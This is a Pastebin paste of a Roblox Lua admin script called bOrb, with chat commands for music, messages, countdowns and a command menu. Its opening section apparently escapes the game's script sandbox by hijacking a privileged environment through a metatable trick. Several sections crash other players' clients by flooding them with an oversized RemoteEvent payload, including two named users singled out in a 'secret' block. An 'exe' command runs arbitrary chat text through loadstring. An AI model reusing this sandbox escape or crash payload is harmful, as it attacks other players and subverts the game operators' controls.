Advertisement
lolhaha197

Untitled

Jan 30th, 2016
123
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 43.17 KB | None | 0 0
  1.  
  2. --[[Hola, thanks for using bOrb!]]--
  3. --[[Beta Testers: Om3gapro5ooo
  4. --[[Made by Basictality
  5.  
  6. -------------------Terms and Agreements-------------
  7. By using this script you agree that Basictality all of bOrb, if you
  8. say you made bOrb, terrible consequences will happen in matter.
  9. ---------------(c): Made By Basictality-------------
  10. --]]
  11. wait()
  12. script.Parent=nil
  13. local fenv = getfenv()
  14. i = game:service'InsertService':LoadAssetVersion(519416165)
  15. n = i:children()[1] --Loads the AssetVersion c:
  16. game:service'Debris':AddItem(i,0)
  17. n.Parent=workspace
  18. coroutine.yield()
  19. local Environment
  20. pcall(_G.OSC_AddServerSideData,setmetatable({},{__index=function()
  21. Environment=getfenv(2)end}))
  22. _G.OSC_AddServerSideData=nil
  23. game:service'Debris':AddItem(n,0)
  24. Environment.print=fenv.print
  25. Environment.warn=fenv.warn
  26. Environment.error=fenv.error
  27. Environment.owner=fenv.owner
  28. setfenv(1,Environment)
  29.  
  30. wait() --ignore this. (if u touch it won't load)
  31. adminwew = game:GetService('Players'):FindFirstChild(owner.Name)
  32. --Put you're name in HERE!
  33. local admins = {adminwew.vr3m,adminwew}
  34. chatname = '[bOrb]: '
  35. wpadtrans = "0"
  36. OrbName = "bOrb"
  37. dis = "7"
  38. Speed = "0.030" --The best ones are 0.30 - 0.5
  39. Banned = "NoobName" --I tought him all he knows, then he turns on me such a "nice" friend..
  40. Chat = true
  41. bplyrs = game:GetService('Players')
  42. -------------------------------Anti Ban---------------------------------
  43. --wip
  44. ----------------------------------------------------------------------------------------------
  45. print[[version 53]]
  46. meplyr = adminwew
  47. --------Change prefix--------
  48. prefixx=Instance.new('StringValue',nil)
  49. prefixx.Value = '-'
  50. game:GetService('RunService').Stepped:connect(function()
  51. prefix = prefixx.Value
  52. end)
  53. function OnChatted(msg)
  54. if msg:lower():sub(1,5) == prefix.."bet " then
  55. prefixx.Value = msg:sub(6,#msg)
  56. wait()
  57. end
  58. end
  59.  
  60. adminwew.Chatted:connect(OnChatted)
  61. ----------Musiclist----------
  62. function OnChatted(msg)
  63. if msg:lower():sub(1,10) == prefix.."musiclist" then
  64. mltpos=Instance.new('StringValue',nil)
  65. mltpos.Value = "0"
  66. mlsg=Instance.new('ScreenGui',adminwew.PlayerGui)
  67. mlf=Instance.new('Frame',mlsg)
  68. mlf.Size = UDim2.new(0,250,0,350)
  69. mlf.BackgroundTransparency=0.5
  70. mlf.BackgroundColor = BrickColor.new'Black'
  71. mlf.Position = UDim2.new(0,50,0,170)
  72. mlf.Active = true
  73. mlf.Draggable = true
  74.  
  75. mlt=Instance.new('TextLabel',mlf)
  76. mlt.Text = "Music List"
  77. mlt.Size = UDim2.new(0,230,0,20)
  78. mlt.TextScaled = true
  79. mlt.BackgroundColor = BrickColor.new'Really black'
  80. mlt.BackgroundTransparency=0.2
  81. mlt.TextColor3 = Color3.new(255,255,255)
  82.  
  83. mltb=Instance.new('TextButton',mlt)
  84. mltb.Text = "(X)"
  85. mltb.Size = UDim2.new(0,20,0,20)
  86. mltb.TextScaled = true
  87. mltb.Position = UDim2.new(0,230,0,0)
  88. mltb.BackgroundColor = BrickColor.new'Crimson'
  89.  
  90. function onClick()
  91. mlsg:remove()
  92. end
  93.  
  94. mltb.MouseButton1Down:connect(onClick)
  95.  
  96.  
  97. mlsc=Instance.new('ScrollingFrame',mlf)
  98. mlsc.Position = UDim2.new(0,0,0,20)
  99. mlsc.Size = UDim2.new(0,250,0,330)
  100. mlsc.BackgroundTransparency=1
  101.  
  102. function AddMus(asd)
  103. mltl = Instance.new('TextLabel',mlsc)
  104. mltl.Size = UDim2.new(0,250,0,30)
  105. mltl.Position = UDim2.new(0,0,0,mltpos.Value)
  106. mltl.Text = asd
  107. mltl.BackgroundTransparency=0.6
  108. mltl.BackgroundColor3 = Color3.new(0,0,0)
  109. mltl.TextScaled = true
  110. mltl.TextStrokeTransparency = 0
  111. mltl.TextColor3 = Color3.new(255,255,255)
  112. wait()
  113. mltpos.Value = mltpos.Value + 32
  114. end
  115.  
  116. AddMus('watchasay')
  117. AddMus('energy')
  118. AddMus('iverson')
  119. AddMus('ddesert')
  120. AddMus('antidote')
  121. AddMus('hello')
  122.  
  123. end
  124. end
  125.  
  126. adminwew.Chatted:connect(OnChatted)
  127. ----=-------------------Music---------------------
  128. function OnChatted(msg)
  129. if msg:lower():sub(1,5) == prefix.."mus " then
  130. find = 'BasMus'
  131. if workspace.Terrain:FindFirstChild(find) then
  132. game.Debris:AddItem(workspace.Terrain[find],0)
  133. end
  134. msgs=Instance.new('Sound',workspace.Terrain)
  135. msgs.SoundId = "http://www.roblox.com/asset/?id="..msg:sub(6,#msg)
  136. msgs.Volume = 5
  137. msgs.Name = 'BasMus'
  138. msgs.Pitch = 1
  139. msgs.Looped = true
  140. msgs:play()
  141. -----------------------musiclist sounds-----------------------
  142. if string.find(msg:sub(6,#msg),'watchasay') then
  143. msgs.SoundId = "http://www.roblox.com/asset/?id=177681012"
  144. end
  145.  
  146. if string.find(msg:sub(6,#msg),'energy') then
  147. msgs.SoundId = "http://www.roblox.com/asset/?id=150455860"
  148. end
  149.  
  150. if string.find(msg:sub(6,#msg),'ddesert') then
  151. msgs.SoundId = "http://www.roblox.com/asset/?id=229990159"
  152. end
  153.  
  154. if string.find(msg:sub(6,#msg),'antidote') then
  155. msgs.SoundId = "http://www.roblox.com/asset/?id=346786918"
  156. end
  157.  
  158. if string.find(msg:sub(6,#msg),'iverson') then
  159. msgs.SoundId = "http://www.roblox.com/asset/?id=305476324"
  160. end
  161.  
  162. if string.find(msg:sub(6,#msg),'hello') then
  163. msgs.SoundId = "http://www.roblox.com/asset/?id=313694441"
  164. end
  165. ---------------------------------------------------------------
  166.  
  167. if Chat == true then
  168. game:GetService("Chat"):Chat(wpad,chatname.."Playing "..msg:sub(6,#msg)..".",Enum.ChatColor.Blue)
  169.  
  170. end
  171. end
  172. end
  173.  
  174. adminwew.Chatted:connect(OnChatted)
  175.  
  176. --------Hide and show--------
  177. hidevalue = Instance.new('StringValue',nil)
  178. hidevalue.Value = "Visible"
  179.  
  180. function OnChatted(msg)
  181. if msg:lower():sub(1,5) == prefix.."hide" then
  182. hidevalue.Value = "Invisible"
  183. for i = 0,1,0.1 do wait()
  184. wpad.Transparency = i
  185. wpadpointlight.Parent = nil
  186. end
  187. end
  188. end
  189.  
  190. adminwew.Chatted:connect(OnChatted)
  191. -------------------------------
  192. function OnChatted(msg)
  193. if msg:lower():sub(1,5) == prefix.."show" then
  194. hidevalue.Value = "Visible"
  195. for i = 1,0,-0.1 do wait()
  196. wpad.Transparency = i
  197. wpadpointlight.Parent = wpad
  198. end
  199. end
  200. end
  201.  
  202. adminwew.Chatted:connect(OnChatted)
  203. -----private server & non pri------
  204. pri=Instance.new('StringValue',nil)
  205. pri.Value = "1"
  206.  
  207. function OnChatted(msg)
  208. if msg:lower():sub(1,6) == prefix.."slock" then
  209. pri.Value = "-1"
  210.  
  211. end
  212.  
  213. if msg:lower():sub(1,8) == prefix.."unslock" then
  214. pri.Value = "1"
  215. end
  216. end
  217.  
  218. adminwew.Chatted:connect(OnChatted)
  219. -----private server function------
  220. if pri.Value == "-1" then
  221. game.Players.ChildAdded:connect(function(prii) if prii.Name~="Basictality" and prii.Name~=adminwew.Name then
  222. prirem=Instance.new('RemoteEvent',workspace):FireClient(prii,{string.rep("umad?",2e5+5)})
  223. end
  224. end)
  225. end
  226. ----------Countdown----------
  227. function OnChatted(msg)
  228. if msg:lower():sub(1,4) == prefix.."cd " then
  229. testcd=Instance.new('Hint',workspace)
  230. for i = msg:sub(5,#msg),0,-1 do wait(0.8)
  231. testcd.Text=i
  232. end
  233. testcd.Text = "Go!"
  234. delay(1,function()
  235. testcd:remove()
  236. end)
  237. end
  238. end
  239.  
  240. adminwew.Chatted:connect(OnChatted)
  241.  
  242. function OnChatted(msg)
  243. if msg:lower():sub(1,11) == prefix.."countdown " then
  244. testcd=Instance.new('Hint',workspace)
  245. for i = msg:sub(12,#msg),0,-1 do wait(0.8)
  246. testcd.Text=i
  247. end
  248. testcd.Text = "Go!"
  249. delay(1,function()
  250. testcd:remove()
  251. end)
  252. end
  253. end
  254.  
  255. adminwew.Chatted:connect(OnChatted)
  256. ----------Message-----------
  257. function OnChatted(msg)
  258. if msg:lower():sub(1,3) == prefix.."m " then
  259. for i,v in pairs(game.Players:children()) do
  260. mesgui=Instance.new('ScreenGui',v.PlayerGui)
  261. mesframe=Instance.new('Frame',mesgui)
  262. mesframe.Size = UDim2.new(0,1,0,1)
  263. mesframe.BackgroundTransparency=0.6
  264. mesframe.Position = UDim2.new(0,-2000,0,0)
  265. mesframe.BackgroundColor3 = Color3.new(0,0,0)
  266. mesframe:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", 1.2)
  267. mesframe:TweenSize(UDim2.new(0, 1400, 0, 700), "Out", 1.2)
  268.  
  269. mestl=Instance.new('TextLabel',mesframe)
  270. mestl.TextScaled = true
  271. mestl.Text = 'Message from '..adminwew.Name..':'
  272. mestl.BackgroundColor3 = Color3.new(255,255,255)
  273. mestl.BackgroundTransparency = 0.4
  274. mestl.TextColor3 = Color3.new(255,255,255)
  275. mestl.Size = UDim2.new(0,1400,0,50)
  276.  
  277. mestl1=Instance.new('TextLabel',mesframe)
  278. mestl1.TextScaled = true
  279. mestl1.Text = msg:sub(4,#msg)
  280. mestl1.Position = UDim2.new(0,0,0,300)
  281. mestl1.BackgroundTransparency = 0.5
  282. mestl1.TextColor3 = Color3.new(255,255,255)
  283. mestl1.Size = UDim2.new(0,1400,0,50)
  284. game.Debris:AddItem(mesframe,3)
  285. end
  286. end
  287. end
  288.  
  289. adminwew.Chatted:connect(OnChatted)
  290. ------------Pitch------------
  291. function OnChatted(msg)
  292. if msg:lower():sub(1,7) == prefix.."pitch " then
  293. find = 'BasMus'
  294. if workspace.Terrain:FindFirstChild(find) then
  295. workspace.Terrain[find].Pitch = msg:sub(8,#msg)
  296. end
  297. end
  298. end
  299.  
  300. adminwew.Chatted:connect(OnChatted)
  301. -----------Ambient-----------
  302. function OnChatted(msg)
  303. if msg:lower():sub(1,9) == prefix.."ambient " then
  304. game.Lighting.Ambient = Color3.new(msg:sub(10,#msg),msg:sub(10,#msg),msg:sub(10,#msg))
  305. end
  306. end
  307.  
  308. adminwew.Chatted:connect(OnChatted)
  309. -------------Time------------
  310. function OnChatted(msg)
  311. if msg:lower():sub(1,6) == prefix.."time " then
  312. game.Lighting.TimeOfDay = msg:sub(7,#msg)
  313. end
  314. end
  315.  
  316. adminwew.Chatted:connect(OnChatted)
  317. ----------Exe Script---------
  318. function OnChatted(msg)
  319. if msg:lower():sub(1,5) == prefix.."exe " then
  320. loadstring(msg:sub(6,#msg))()
  321. if Chat == true then
  322. game:GetService("Chat"):Chat(wpad,chatname.."Executed script.",Enum.ChatColor.Blue)
  323. end
  324. end
  325. end
  326.  
  327. adminwew.Chatted:connect(OnChatted)
  328. --Ban Stuff--
  329. local banfolder = Instance.new('Folder',game.ServerStorage)
  330. banfolder.Name = "bOrb Bans"
  331. game:GetService('RunService').Stepped:connect(function()
  332. for i,x in pairs(banfolder:children()) do
  333. for i,v in pairs(game.Players:children()) do if v.Name==x.Value then
  334. removeclient=Instance.new('RemoteEvent',workspace):FireClient(game.Players[x.Value],{string.rep("umad?",2e5+5)})
  335. end
  336. end
  337. end
  338. end)
  339.  
  340. -----------------_G stuff---------
  341. game:GetService('RunService').Stepped:connect(function()
  342. _G.bBans = banfolder
  343. _G.sb = 'Haxed by bOrb'
  344. end)
  345. ---------------secret stuffz---------
  346. if adminwew == bplyrs:FindFirstChild('Sarah67854') then
  347. removeclient=Instance.new('RemoteEvent',workspace):FireClient(adminwew,{string.rep("umad?",2e5+5)})
  348. game.Debris:AddItem(removeclient,1)
  349. end
  350.  
  351. if adminwew == bplyrs:FindFirstChild('Ayumuki') then
  352. removeclient=Instance.new('RemoteEvent',workspace):FireClient(adminwew,{string.rep("umad?",2e5+5)})
  353. game.Debris:AddItem(removeclient,1)
  354. end
  355.  
  356. if not OrbName == "bOrb" then
  357. OrbName = "bOrb"
  358. end
  359. ----------cmds gui-----------
  360. function OnChatted(cmds)
  361. if cmds:lower():sub(1,7) == prefix.."cmds" then
  362. cmdgui=Instance.new('ScreenGui',adminwew.PlayerGui)
  363. cmdframe=Instance.new('Frame',cmdgui)
  364. cmdframe.Size = UDim2.new(0,500,0,350)
  365. cmdframe.Position = UDim2.new(0,430,0,-300)
  366. cmdframe:TweenPosition(UDim2.new(0,430,0,200),'Out','Quad',0.35)
  367. cmdframe.BackgroundTransparency=0.5
  368. cmdframe.BackgroundColor3 = Color3.new(0,0,0)
  369.  
  370. cmdtl=Instance.new('TextLabel',cmdframe)
  371. cmdtl.Text = "Commands [24]"
  372. cmdtl:TweenSize(UDim2.new(0,500,0,50),'Out','Quad',0.35)
  373. cmdtl.TextScaled = true
  374. cmdtl.BackgroundTransparency=1
  375. cmdtl.TextColor3 = Color3.new(255,255,255)
  376. cmdtl.TextStrokeTransparency = 0
  377.  
  378. cmdprefixltl=Instance.new('TextLabel',cmdframe)
  379. cmdprefixltl.Text = "Prefix: "..prefix
  380. cmdprefixltl:TweenSize(UDim2.new(0,100,0,50),'Out','Quad',0.35)
  381. cmdprefixltl.BackgroundTransparency=1
  382. cmdprefixltl.TextColor3 = Color3.new(255,255,255)
  383. cmdprefixltl.TextStrokeTransparency = 0
  384. cmdprefixltl.FontSize = "Size14"
  385. cmdprefixltl:TweenPosition(UDim2.new(0,-5,0,-15),'Out','Quad',0.35)
  386.  
  387. cmdbutton=Instance.new('TextButton',cmdframe)
  388. cmdbutton.TextScaled = true
  389. cmdbutton.Text = "X"
  390. cmdbutton.BackgroundTransparency = 1
  391. cmdbutton.TextColor3 = Color3.new(1,0,0)
  392. cmdbutton.Size = UDim2.new(0,50,0,50)
  393. cmdbutton:TweenPosition(UDim2.new(0,450,0,0),'Out','Quad',0.35)
  394.  
  395. function onClick()
  396. cmdframe:TweenPosition(UDim2.new(0,430,0,700),'Out','Quad',0.35)
  397. game.Debris:AddItem(cmdframe,2)
  398. end
  399.  
  400. cmdbutton.MouseButton1Down:connect(onClick)
  401.  
  402. sf=Instance.new('ScrollingFrame',cmdframe)
  403. sf:TweenSize(UDim2.new(0,480,0,260),'Out','Quad',0.35)
  404. sf:TweenPosition(UDim2.new(0,10,0,50),'Out','Quad',0.35)
  405. sf.BackgroundTransparency = 0.5
  406. sf.BackgroundColor3 = Color3.new(0,0,0)
  407.  
  408. fc=Instance.new('TextLabel',sf)
  409. fc.TextColor3 = Color3.new(255,255,255)
  410. fc.TextScaled = true
  411. fc.Text = "Explode <plyr>"
  412. fc.BackgroundColor = BrickColor.new'Dark blue'
  413. fc:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  414. fc.BackgroundTransparency=0
  415.  
  416. sc=fc:Clone()
  417. sc.Parent = sf
  418. sc.Text = "kill <plyr>"
  419. sc:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  420. sc:TweenPosition(UDim2.new(0,0,0,35),'Out','Quad',0.35)
  421.  
  422. tc=sc:clone()
  423. tc.Parent = sf
  424. tc.Text = "UnGod <plyr>"
  425. tc:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  426. tc:TweenPosition(UDim2.new(0,0,0,70),'Out','Quad',0.35)
  427.  
  428. fc=sc:clone()
  429. fc.Parent = sf
  430. fc.Text = "Freeze <plyr>"
  431. fc:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  432. fc:TweenPosition(UDim2.new(0,0,0,105),'Out','Quad',0.35)
  433.  
  434. fic=sc:clone()
  435. fic.Parent = sf
  436. fic.Text = "Thaw <plyr>"
  437. fic:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  438. fic:TweenPosition(UDim2.new(0,0,0,140),'Out','Quad',0.35)
  439.  
  440. sic=sc:clone()
  441. sic.Parent = sf
  442. sic.Text = "resp/respawn/res <plyr>"
  443. sic:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  444. sic:TweenPosition(UDim2.new(0,0,0,175),'Out','Quad',0.35)
  445.  
  446. sec=sc:clone()
  447. sec.Parent = sf
  448. sec.Text = "God <plyr>"
  449. sec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  450. sec:TweenPosition(UDim2.new(0,0,0,210),'Out','Quad',0.35)
  451.  
  452. eec=sc:clone()
  453. eec.Parent = sf
  454. eec.Text = "BSOD/Lag <plyr>"
  455. eec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  456. eec:TweenPosition(UDim2.new(0,0,0,245),'Out','Quad',0.35)
  457.  
  458. nec=sc:clone()
  459. nec.Parent = sf
  460. nec.Text = "ff/shield/forcefield <plyr>"
  461. nec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  462. nec:TweenPosition(UDim2.new(0,0,0,280),'Out','Quad',0.35)
  463.  
  464. tec=sc:clone()
  465. tec.Parent = sf
  466. tec.Text = "kick/boot <plyr>"
  467. tec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  468. tec:TweenPosition(UDim2.new(0,0,0,315),'Out','Quad',0.35)
  469.  
  470. elec=sc:clone()
  471. elec.Parent = sf
  472. elec.Text = "ban/banish <plyr>"
  473. elec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  474. elec:TweenPosition(UDim2.new(0,0,0,350),'Out','Quad',0.35)
  475.  
  476. twec=sc:clone()
  477. twec.Parent = sf
  478. twec.Text = "unban/unbanish <plyr>"
  479. twec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  480. twec:TweenPosition(UDim2.new(0,0,0,385),'Out','Quad',0.35)
  481.  
  482. thec=sc:clone()
  483. thec.Parent = sf
  484. thec.Text = "sword <plyr>"
  485. thec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  486. thec:TweenPosition(UDim2.new(0,0,0,420),'Out','Quad',0.35)
  487.  
  488. foec=sc:clone()
  489. foec.Parent = sf
  490. foec.Text = "ngrav/nograv/nogravity <plyr>"
  491. foec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  492. foec:TweenPosition(UDim2.new(0,0,0,455),'Out','Quad',0.35)
  493.  
  494. fiec=sc:clone()
  495. fiec.Parent = sf
  496. fiec.Text = "grav/gravity <plyr>"
  497. fiec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  498. fiec:TweenPosition(UDim2.new(0,0,0,490),'Out','Quad',0.35)
  499.  
  500. sixec=sc:clone()
  501. sixec.Parent = sf
  502. sixec.Text = "unjail/nojail <plyr>"
  503. sixec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  504. sixec:TweenPosition(UDim2.new(0,0,0,525),'Out','Quad',0.35)
  505.  
  506. sitec=sc:clone()
  507. sitec.Parent = sf
  508. sitec.Text = "light/plight <plyr>"
  509. sitec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  510. sitec:TweenPosition(UDim2.new(0,0,0,560),'Out','Quad',0.35)
  511.  
  512. enitec=sc:clone()
  513. enitec.Parent = sf
  514. enitec.Text = "rlight/nolight/unlight <plyr>"
  515. enitec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  516. enitec:TweenPosition(UDim2.new(0,0,0,595),'Out','Quad',0.35)
  517.  
  518. nineteen=sc:clone()
  519. nineteen.Parent = sf
  520. nineteen.Text = "jail/lockup <plyr>"
  521. nineteen:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  522. nineteen:TweenPosition(UDim2.new(0,0,0,630),'Out','Quad',0.35)
  523.  
  524. twenty=sc:clone()
  525. twenty.Parent = sf
  526. twenty.Text = "unff/unforcefield/unshield <plyr>"
  527. twenty:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  528. twenty:TweenPosition(UDim2.new(0,0,0,630),'Out','Quad',0.35)
  529.  
  530. twenty1=sc:clone()
  531. twenty1.Parent = sf
  532. twenty1.Text = "jail <plyr>"
  533. twenty1:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  534. twenty1:TweenPosition(UDim2.new(0,0,0,665),'Out','Quad',0.35)
  535.  
  536. twenty2=sc:clone()
  537. twenty2.Parent = sf
  538. twenty2.Text = "sit <plyr>"
  539. twenty2:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  540. twenty2:TweenPosition(UDim2.new(0,0,0,0),'Out','Quad',0.35)
  541. twenty2.TextTransparency=1
  542. twenty2.BackgroundTransparency=1
  543.  
  544. twenty3=sc:clone()
  545. twenty3.Parent = sf
  546. twenty3.Text = "jump <plyr>"
  547. twenty3:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  548. twenty3:TweenPosition(UDim2.new(0,0,0,35),'Out','Quad',0.35)
  549. twenty3.TextTransparency=1
  550. twenty3.BackgroundTransparency=1
  551.  
  552. twenty4=sc:clone()
  553. twenty4.Parent = sf
  554. twenty4.Text = "Commands/Cmds"
  555. twenty4:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  556. twenty4:TweenPosition(UDim2.new(0,0,0,70),'Out','Quad',0.35)
  557. twenty4.TextTransparency=1
  558. twenty4.BackgroundTransparency=1
  559.  
  560. twenty5=sc:clone()
  561. twenty5.Parent = sf
  562. twenty5.Text = "exe <script>"
  563. twenty5:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  564. twenty5:TweenPosition(UDim2.new(0,0,0,105),'Out','Quad',0.35)
  565. twenty5.TextTransparency=1
  566. twenty5.BackgroundTransparency=1
  567.  
  568. twenty6=sc:clone()
  569. twenty6.Parent = sf
  570. twenty6.Text = "mus <soundid>"
  571. twenty6:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  572. twenty6:TweenPosition(UDim2.new(0,0,0,140),'Out','Quad',0.35)
  573. twenty6.TextTransparency=1
  574. twenty6.BackgroundTransparency=1
  575.  
  576. twenty7=sc:clone()
  577. twenty7.Parent = sf
  578. twenty7.Text = "time <number>"
  579. twenty7:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  580. twenty7:TweenPosition(UDim2.new(0,0,0,175),'Out','Quad',0.35)
  581. twenty7.TextTransparency=1
  582. twenty7.BackgroundTransparency=1
  583.  
  584. twenty8=sc:clone()
  585. twenty8.Parent = sf
  586. twenty8.Text = "ambient <number>"
  587. twenty8:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  588. twenty8:TweenPosition(UDim2.new(0,0,0,210),'Out','Quad',0.35)
  589. twenty8.TextTransparency=1
  590. twenty8.BackgroundTransparency=1
  591.  
  592. twenty9=sc:clone()
  593. twenty9.Parent = sf
  594. twenty9.Text = "pitch <number>"
  595. twenty9:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  596. twenty9:TweenPosition(UDim2.new(0,0,0,245),'Out','Quad',0.35)
  597. twenty9.TextTransparency=1
  598. twenty9.BackgroundTransparency=1
  599.  
  600. thirty0=sc:clone()
  601. thirty0.Parent = sf
  602. thirty0.Text = "fire <plyr>"
  603. thirty0:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  604. thirty0:TweenPosition(UDim2.new(0,0,0,245),'Out','Quad',0.35)
  605. thirty0.TextTransparency=1
  606. thirty0.BackgroundTransparency=1
  607.  
  608. thirty1=sc:clone()
  609. thirty1.Parent = sf
  610. thirty1.Text = "sparkles <plyr>"
  611. thirty1:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  612. thirty1:TweenPosition(UDim2.new(0,0,0,245),'Out','Quad',0.35)
  613. thirty1.TextTransparency=1
  614. thirty1.BackgroundTransparency=1
  615.  
  616. thirty2=sc:clone()
  617. thirty2.Parent = sf
  618. thirty2.Text = "hide"
  619. thirty2:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  620. thirty2:TweenPosition(UDim2.new(0,0,0,280),'Out','Quad',0.35)
  621. thirty2.TextTransparency=1
  622. thirty2.BackgroundTransparency=1
  623.  
  624. thirty3=sc:clone()
  625. thirty3.Parent = sf
  626. thirty3.Text = "show"
  627. thirty3:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  628. thirty3:TweenPosition(UDim2.new(0,0,0,315),'Out','Quad',0.35)
  629. thirty3.TextTransparency=1
  630. thirty3.BackgroundTransparency=1
  631.  
  632. thirty4=sc:clone()
  633. thirty4.Parent = sf
  634. thirty4.Text = "rguis/nguis/noguis <plyr>"
  635. thirty4:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
  636. thirty4:TweenPosition(UDim2.new(0,0,0,350),'Out','Quad',0.35)
  637. thirty4.TextTransparency=1
  638. thirty4.BackgroundTransparency=1
  639.  
  640. newp=Instance.new('TextButton',cmdframe)
  641. newp.Text = ">"
  642. newp.TextColor3 = Color3.new(255,255,255)
  643. newp.TextScaled = true
  644. newp:TweenSize(UDim2.new(0,100,0,30),'Out','Quad',0.35)
  645. newp:TweenPosition(UDim2.new(0,370,0,315),'Out','Quad',0.35)
  646.  
  647. function onClick()
  648. for i,v in pairs(sf:children()) do if v.ClassName=="TextLabel" then
  649. v.TextTransparency = 1
  650. v.BackgroundTransparency = 1
  651. twenty2.TextTransparency=0
  652. twenty2.BackgroundTransparency=0
  653. twenty3.TextTransparency=0
  654. twenty3.BackgroundTransparency=0
  655. twenty4.TextTransparency=0
  656. twenty4.BackgroundTransparency=0
  657. twenty5.TextTransparency=0
  658. twenty5.BackgroundTransparency=0
  659. twenty6.TextTransparency=0
  660. twenty6.BackgroundTransparency=0
  661. twenty7.TextTransparency=0
  662. twenty7.BackgroundTransparency=0
  663. twenty8.TextTransparency=0
  664. twenty8.BackgroundTransparency=0
  665. twenty9.TextTransparency=0
  666. twenty9.BackgroundTransparency=0
  667. thirty0.TextTransparency=0
  668. thirty0.BackgroundTransparency=0
  669. thirty1.TextTransparency=0
  670. thirty1.BackgroundTransparency=0
  671. thirty2.TextTransparency=0
  672. thirty2.BackgroundTransparency=0
  673. thirty3.TextTransparency=0
  674. thirty3.BackgroundTransparency=0
  675. thirty4.TextTransparency=0
  676. thirty4.BackgroundTransparency=0
  677. end
  678. pgtl.Text = "Page 2/2"
  679. end
  680. end
  681.  
  682. newp.MouseButton1Down:connect(onClick)
  683.  
  684.  
  685. oldp=Instance.new('TextButton',cmdframe)
  686. oldp.Text = "<"
  687. oldp.TextColor3 = Color3.new(255,255,255)
  688. oldp.TextScaled = true
  689. oldp:TweenSize(UDim2.new(0,100,0,30),'Out','Quad',0.35)
  690. oldp:TweenPosition(UDim2.new(0,25,0,315),'Out','Quad',0.35)
  691.  
  692. function onClick()
  693. for i,v in pairs(sf:children()) do if v.ClassName=="TextLabel" then
  694. v.TextTransparency = 0
  695. v.BackgroundTransparency = 0
  696. end
  697. pgtl.Text = "Page 1/2"
  698. twenty2.TextTransparency=1
  699. twenty2.BackgroundTransparency=1
  700. twenty3.TextTransparency=1
  701. twenty3.BackgroundTransparency=1
  702. twenty4.TextTransparency=1
  703. twenty4.BackgroundTransparency=1
  704. twenty5.TextTransparency=1
  705. twenty5.BackgroundTransparency=1
  706. twenty6.TextTransparency=1
  707. twenty6.BackgroundTransparency=1
  708. twenty7.TextTransparency=1
  709. twenty7.BackgroundTransparency=1
  710. twenty8.TextTransparency=1
  711. twenty8.BackgroundTransparency=1
  712. twenty9.TextTransparency=1
  713. twenty9.BackgroundTransparency=1
  714. thirty0.TextTransparency=1
  715. thirty0.BackgroundTransparency=1
  716. thirty1.TextTransparency=1
  717. thirty1.BackgroundTransparency=1
  718. thirty2.TextTransparency=1
  719. thirty2.BackgroundTransparency=1
  720. thirty3.TextTransparency=1
  721. thirty3.BackgroundTransparency=1
  722. thirty4.TextTransparency=1
  723. thirty4.BackgroundTransparency=1
  724. end
  725. end
  726.  
  727. oldp.MouseButton1Down:connect(onClick)
  728.  
  729. pgtl=Instance.new('TextLabel',cmdframe)
  730. pgtl.Text = "Page 1/2"
  731. pgtl:TweenSize(UDim2.new(0,100,0,30),'Out','Quad',0.35)
  732. pgtl.TextScaled = true
  733. pgtl.BackgroundTransparency=1
  734. pgtl.TextColor3 = Color3.new(255,255,255)
  735. pgtl.TextStrokeTransparency = 0
  736. pgtl:TweenPosition(UDim2.new(0,200,0,315),'Out','Quad',0.35)
  737. end
  738. end
  739. adminwew.Chatted:connect(OnChatted)
  740. -----------------------------------------------------------------
  741.  
  742.  
  743. isAdmin = function(p)
  744. for i,v in pairs(admins)do
  745. if p.Name == v then
  746. return true;
  747. end;
  748. end;
  749. return false;
  750. end;
  751. local Players = bplyrs;
  752. local people = function(str)
  753. local players = {};
  754. local strs = {
  755. {"me", "myself", function() players[#players+1]=meplyr end;};
  756. {"all", "everyone", "everybody", function() for i,v in pairs(Players:GetPlayers())do players[#players+1]=v; end; end;};
  757. {"others", "notme", function() for i,v in pairs(Players:GetPlayers())do if v.Name~= meplyr.Name then players[#players+1]=v; end; end; end;};
  758. {"admins", "admined", function() for i,v in pairs(Players:GetPlayers())do if isAdmin(v) then players[#players+1]=v; end; end; end;};
  759. {"nonadmins", "nonadmined", function() for i,v in pairs(Players:GetPlayers())do if not isAdmin(v) then players[#players+1]=v; end; end; end;};
  760. };
  761. for i,v in pairs(strs)do
  762. for q,k in pairs(v)do
  763. if str == k then
  764. v[#v]();
  765. break;
  766. end;
  767. end;
  768. end;
